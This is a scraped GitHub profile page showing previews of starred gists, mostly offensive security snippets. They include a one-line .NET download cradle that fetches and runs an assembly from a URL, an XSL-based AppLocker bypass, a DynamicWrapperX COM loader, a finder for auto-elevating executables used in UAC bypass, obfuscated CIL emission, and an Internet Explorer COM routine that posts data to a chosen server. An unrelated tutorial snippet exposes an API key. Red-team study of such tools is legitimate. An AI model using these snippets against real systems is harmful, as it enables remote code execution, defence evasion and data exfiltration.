Skip to content

Instantly share code, notes, and snippets.

View fsacer's full-sized avatar
🎯
Infosec

Franci Šacer fsacer

🎯
Infosec
32 followers · 50 following
View GitHub Profile
@rvrsh3ll
rvrsh3ll / sc.js
Created February 2, 2022 20:46
DynamicWrapperX - Register Code Example
//Example Reference:
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
// Test
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
// Change that C:\\Tools to a location you specify, or dynamically find current directory.
// ActCTX will search for the DLL in TMP
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
@janoglezcampos
janoglezcampos / find_function.cpp
Last active August 29, 2022 09:24
Find non exported functions in a module using masks.
#include <windows.h>
#include <stdio.h>
#include <psapi.h>
typedef char * (*ParseHeaders)(LPCSTR, int *);
BOOL bCompare(const BYTE* pData, const BYTE* bMask, const char* szMask)
{
for (; *szMask; ++szMask, ++pData, ++bMask)
if (*szMask == 'x' && *pData != *bMask)
@mpj
mpj / monad-stream-example.js
Last active September 14, 2022 06:42
This is the code from Monads - episode #21 of FunFunFunction (https://www.youtube.com/playlist?list=PL0zVEGEvSaeFSwPn06GKArptSxiP1Gff8)
const fetch = require('node-fetch')
const Bacon = require('baconjs')
function getInPortuguese(word) {
// Google Translate API is a paid (but dirt cheap) service. This is my key
// and will be disabled by the time the video is out. To generate your own,
// go here: https://cloud.google.com/translate/v2/getting_started
const apiKey =
'AIzaSyB4DyRHIsNhogQXmH16YKbZfR-lTXrQpq0'
const url =
@bohops
bohops / xsl-notepad.xml
Last active September 26, 2022 23:29
XSL Testing (++++++ netbiosX and subTee) - https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
@Evilcry
Evilcry / findautoelevate.ps1
Created July 8, 2018 07:40
Enumerate executables with auto-elevation enabled
# Find Autoelevate executables
Write-Host "System32 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black
Select-String -Path C:\Windows\System32\*.exe -pattern "<AutoElevate>true"
Write-Host "`nSysWOW64 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black
Select-String -Path C:\Windows\SysWOW64\*.exe -pattern "<AutoElevate>true"
@cobbr
cobbr / DotnetAssemblyDownloadCradle.cs
Created June 20, 2018 22:37
A download cradle for .NET assemblies.
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
@bandrel
bandrel / check_hashes.py
Last active February 2, 2023 15:55
To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#!/usr/bin/env python3
#Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH:::
# ./check_hashes.py <hash_dump>
import argparse
import re
parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords")
@mattifestation
mattifestation / CILStreamObfuscation.ps1
Created March 1, 2018 20:18
${🤷} = New-Object Reflection.Emit.DynamicMethod('💩', [UInt32], @([UInt32], [UInt32]))
${🤔} = ${🤷}.GetILGenerator()
@(@(2, 275120805),@(3, 275120805),@(88, -261739867),@(42, 23440101)) | % {
${🤔}.Emit([Activator]::CreateInstance([System.Reflection.Emit.OpCode], [Reflection.BindingFlags] 'NonPublic, Instance', $null, @(($_[0] -as [System.Reflection.Emit.OpCode].Assembly.GetType('System.Reflection.Emit.OpCodeValues')), $_[1]), $null))
}
${💩} = ${🤷}.CreateDelegate([Func``3[UInt32, UInt32, UInt32]])
${💩}.Invoke(2,3)
@vulnersCom
vulnersCom / Petya_ransomware.md
Last active July 6, 2023 19:30

#petya #petrWrap #notPetya

Win32/Diskcoder.Petya.C

Ransomware attack.

About

This gist was built by the community of the researchers and was scribed by Kir and Igor from the QIWI/Vulners. We are grateful for the help of all those who sent us the data, links and information. Together we can make this world a better place!

Gist updates

@leoloobeek
leoloobeek / ie_com.cs
Last active July 21, 2023 13:07
InternetExplorer.Application PoC's
// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
object IE = Activator.CreateInstance(com_type);
object[] falseArr = new object[] { false };
object[] trueArr = new object[] { true };
com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);